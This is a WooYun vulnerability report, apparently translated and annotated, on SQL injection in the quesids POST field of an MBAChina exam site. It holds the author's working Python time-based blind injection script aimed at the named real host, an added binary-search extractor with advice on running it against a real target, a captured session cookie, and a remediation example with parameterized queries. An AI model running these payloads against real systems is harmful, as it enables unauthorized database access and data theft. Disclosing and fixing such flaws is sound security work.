
Vulnerability summary

Defect ID: wooyun-2015-0156432

Title: SQL injection on an MBAChina site

Vendor: MBAChina

Author: 路人甲

Submitted: 2015-12-02 20:46

Fixed: 2016-01-17 17:34

Published: 2016-01-17 17:34

Type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-12-02: details sent to the vendor, awaiting vendor action
2015-12-07: vendor confirmed; details visible to the vendor only
2015-12-17: details opened to core white hats and domain experts
2015-12-27: details opened to regular white hats
2016-01-06: details opened to intern white hats
2016-01-17: details opened to the public

Brief description:

Detailed description:

The fix was done badly: after it, sqlmap indeed can no longer pull anything out.
Adjust the sleep time yourself; the service 504s very easily.
-----------
[Done]MySQL user is mbaexam
-----------

Proof of vulnerability:

[screenshot: 20151127192005.jpg]


# Time-based blind SQL injection through the quesids POST field of
# /ucenter/exam/getQuesList (author's script, ported from Python 2 to Python 3,
# indentation restored; unused imports and the wrong hard-coded Content-Length dropped).
import http.client
import time
import urllib.parse
from time import sleep

# Candidate characters, tried in this order for every position of the target
# string (the author's ordering is kept as-is).
payloads = list('dedmbacxsehverabcdefghijklmnopqrstuvwxyz@_.0123456789')
base_url = "/ucenter/exam/getQuesList"
database = ''

# Request headers as captured from the author's browser session. The Cookie is
# the author's own logged-in session; one segment was removed on the page and is
# left as-is. The original also sent "Content-Length: 143", which is wrong for
# most payloads; http.client computes the length from the body when the header
# is absent, so it is omitted here.
headers = {
    "User-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
    "Accept": "*/*",
    "Referer": "ks.mbachina.com",
    "X-Requested-With": "XMLHttpRequest",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "keep-alive",
    "Host": "ks.mbachina.com",
    "Cookie": "_sid=f160eb804c57e011dcc5160e61b5adf3410b599d; _i=%2Fx4a8qmEWqzWf0JVfZb4LbnexT5SGeS%2FYLiDG3NBdAR%2Bo2wSHJLVTA%3D%3D_df54f676c3d4530776ae5b86bc275047_1446692677; _l=1446692494; _178c=36281005%23%23testby; _e=31536000; CNZZDATA30044938=cnzz_eid%3D757341134-1446690162-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1446690162; lzstat_uv=2440368293235315611|3; lzstat_ss=712204841_6_1447188375_3; lstat_bc=1514100093928880260; 6c3ae_lastpos=other; 6c3ae_ck_info=%2F%09; 6c3ae_winduser=VVMEAgIDCTECBlQOXwVVAQNRVwYJVlFVCQEKCAcHWFdQAgQAVVNTVD0%3D; _ystat_style=grey; ali_apache_id=182.92.253.28.1447213753471.996202.8; xman_us_f=x_l=1&x_locale=en_US&no_popup_today=n&x_user=US|cena|john|ifm|744887430&last_popup_time=1447222793563; intl_locale=en_US; aep_usuc_f=site=glo&region=CN&b_locale=en_US&isb=y&isfm=y&c_tp=USD&reg_ver=new; xman_t=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; acs_usuc_t=acs_rt=1ca442554e664f4e95f51dea19820746; intl_common_forever=vS/UslZJX1ujWRRwfsCPfl20zxquyCDw5yQboXfI9OtkQoToTKqo1g==; xman_f=wEVqhH+b+eAR46kvyKARt/oHftT2h6y5ipD+6sjZ9GYmr/Tr+EkQAo+WaYFtZbSHlyqVnNAMvg3VUUBmgidINn2hE/MRdTNR5jJV94TZSQWL2AWP4rwgfVCw4MrcqKyozdB5IjA1FfDv6jYbWh2bfP+5Mjd8EGClZJWA4cDkCC8R4v29HJV/7liC+/CxQhNeT1bG3SiTdQxihGRPrSo6Jktbb5F9UUSMMnuVuBwzqiYTw6JMdkMf+2E2GW67Z6iIGly7gh/1LJ6oqYfD0QVEunnDVY2a3WsxAS/e4NdfJagYx48P3GD2l2oRBYLFcq7XJCFrudnvut2KlHYXT/yGvL5AVLKIxPQFW+Gu1SLwX9W9KhNwvexJnhK40QRBCargRNYYKEvba0g=; ali_beacon_id=182.92.253.28.1447213753471.996202.8; cna=qlA/DuKa3k0CAbZc/RwKyHZQ; __utma=3375712.381681950.1447213757.1447213757.1447222530.2; __utmc=3375712; __utmz=3375712.1447213757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); l=AiwseRMhzL09SxTDNl0-hfWi3AFeVdCP; ali_apache_track=mt=1|ms=|mid=us1125640758ctnk; ali_apache_tracktmp=W_signed=Y; PHPSESSID=90577438460ab02245f9bfdff6d68c7b; CNZZDATA1408427=cnzz_eid%3D288945677-1448603092-http%253A%252F%252Fwww.qq.com%252F%26ntime%3D1448603092",
}


def sql():
    global database
    post_data = {"num": "15", "PaperID": "92",
                 "title": "%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3",
                 "type": "radio", "quesids": "a"}
    for i in range(1, 10):                # positions 1..9 of database()
        for payload in payloads:
            sleep(10)                     # pacing: the author notes the service 504s easily
            # Timing oracle: SLEEP(ascii(char) - ord(guess)) returns at once when
            # the guess equals the character, otherwise the request runs past the
            # 5-second client timeout and is counted as a miss.
            data2 = "(select(0)from(select(sleep(ascii(mid(database(),%d,1))-%d)))x)" % (i, ord(payload))
            post_data["quesids"] = data2
            data = urllib.parse.urlencode(post_data)
            now_time = time.time()
            try:
                conn = http.client.HTTPConnection("ks.mbachina.com", timeout=5)
                conn.request('POST', base_url, data, headers)
                conn.getresponse().read()
            except Exception:
                print(".", end="", flush=True)   # timeout (SLEEP fired) or connection error
            if time.time() - now_time < 1:
                database += payload
                print('\r[In Progress]' + database)
            else:
                print(".", end="", flush=True)


if __name__ == "__main__":
    sql()
    # Note: the injected query reads database(), so the value printed under this
    # label is the schema name, as in the author's "[Done]" line above.
    print('\n[Done]MySQL user is ' + database)
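The author's script probes each position linearly, one request per candidate character with a fixed 10-second pause, so a 50-character alphabet can cost up to 50 requests per position. The following is an added example, not part of the report, that generalizes the same time-based oracle into a binary search over the character code using an if()/sleep() payload: about 7 requests per character, and the end of the string is detected from MySQL's ASCII('') = 0. Network I/O is replaced by a constructed mock of the injectable endpoint that evaluates the payload against a made-up secret and returns a simulated response time; the endpoint, the secret and the latency figures are assumptions.

```python
import re
from typing import Callable

DELAY = 2          # seconds the injected SLEEP() adds when the condition holds
THRESHOLD = 1.0    # response time above which the SLEEP is taken to have fired


def payload(position: int, guess: int, delay: int = DELAY) -> str:
    """One bit of information per request: delay only when the character at
    `position` of database() has an ASCII code greater than `guess`.
    Same injection context as the report's script (the quesids POST field)."""
    return ("(select(0)from(select(if(ascii(mid(database(),%d,1))>%d,sleep(%d),0)))x)"
            % (position, guess, delay))


def extract(oracle: Callable[[str], float], max_len: int = 32) -> str:
    """Recover database() one character at a time by binary search over 0..127
    (assumes an ASCII schema name). `oracle` takes the injected string and
    returns the observed response time in seconds."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(payload(pos, mid)) >= THRESHOLD:   # slow => code > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:        # MID() past the end is '' and ASCII('') is 0: finished
            break
        result += chr(lo)
    return result


class MockEndpoint:
    """Constructed stand-in for the vulnerable endpoint (assumption, no network):
    parses the if()/sleep() payload and returns a simulated response time."""
    PATTERN = re.compile(r"mid\(database\(\),(\d+),1\)\)>(\d+),sleep\((\d+)\)")

    def __init__(self, secret: str, base_latency: float = 0.2):
        self.secret = secret              # made-up value of database()
        self.base_latency = base_latency  # normal response time without SLEEP
        self.requests = 0

    def __call__(self, injected: str) -> float:
        self.requests += 1
        m = self.PATTERN.search(injected)
        if not m:
            raise ValueError("payload shape not recognised: " + injected)
        pos, guess, delay = (int(x) for x in m.groups())
        ch = self.secret[pos - 1] if pos <= len(self.secret) else ""   # MID past end -> ''
        code = ord(ch) if ch else 0                                    # ASCII('') -> 0
        return self.base_latency + (delay if code > guess else 0)


if __name__ == "__main__":
    endpoint = MockEndpoint("mbaexam")
    print(extract(endpoint), "in", endpoint.requests, "requests")
```

Against a real target the oracle would be a function that sends the POST and returns the elapsed time; set DELAY well above the server's normal latency (and THRESHOLD between the two), and keep the author's pacing in mind, since the report notes that longer sleeps push the service into 504s.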

Remediation:

~~
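The report gives no fix, and the author's note that sqlmap stopped working while a hand-built sleep payload still did suggests the first fix filtered input rather than removing the injection. The server-side language is not shown on the page; the following is an added illustration in Python with sqlite3, not the vendor's code, of the bug shape (the raw quesids string spliced into an IN list) beside a hardened version that whitelists the value as a comma-separated integer list and binds every id as a parameter. The table, column names and rows are invented.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the exam question store."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE questions(id INTEGER PRIMARY KEY, paper_id INTEGER, title TEXT);
        INSERT INTO questions VALUES (1, 92, 'q1'), (2, 92, 'q2'), (3, 93, 'q3');
    """)
    return conn


def get_ques_list_vulnerable(conn, paper_id: str, quesids: str):
    """Bug shape described in the report: the quesids POST value becomes SQL text,
    so a payload such as the report's sleep() subquery runs inside the IN list."""
    sql = ("SELECT id, title FROM questions WHERE paper_id = %s AND id IN (%s) ORDER BY id"
           % (paper_id, quesids))
    return conn.execute(sql).fetchall()


ID_LIST = re.compile(r"[0-9]+(,[0-9]+)*")   # ASCII digits only; no quotes, spaces or parens


def parse_quesids(quesids: str, limit: int = 100) -> list:
    """Whitelist, not blacklist: accept only a comma-separated list of integers."""
    if not ID_LIST.fullmatch(quesids):
        raise ValueError("quesids must be a comma-separated list of integers")
    ids = [int(p) for p in quesids.split(",")]
    if len(ids) > limit:
        raise ValueError("too many ids")
    return ids


def get_ques_list_fixed(conn, paper_id: str, quesids: str):
    """Hardened form: validated ids, one bound placeholder per id, no SQL built
    from user text. A sleep()/OR payload cannot reach the parser at all."""
    ids = parse_quesids(quesids)
    placeholders = ",".join("?" * len(ids))            # e.g. "?,?,?"
    sql = ("SELECT id, title FROM questions WHERE paper_id = ? AND id IN (%s) ORDER BY id"
           % placeholders)
    return conn.execute(sql, [int(paper_id)] + ids).fetchall()


def is_valid_quesids(quesids: str) -> bool:
    try:
        parse_quesids(quesids)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print(get_ques_list_vulnerable(db, "92", "1) OR 1=1 --"))   # every row, filter bypassed
    print(get_ques_list_fixed(db, "92", "1,2"))
    print(is_valid_quesids("(select(0)from(select(sleep(5)))x)"))
```

sqlite has no SLEEP(), so the timing payload from the report is replaced here by a boolean one that bypasses the paper_id filter; the point is the same, that any text reaching the query string is interpreted as SQL, and that the fix is parameterization plus a strict shape check rather than a list of forbidden keywords.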

Copyright notice: when reproducing, credit 路人甲@乌云 (WooYun)


Responses

Vendor response:

Severity: Low

Rank: 4

Confirmed: 2015-12-07 18:52

Vendor reply:

Thank you very much. We have started handling the issue and appreciate your attention to our security work.

Latest status:

None yet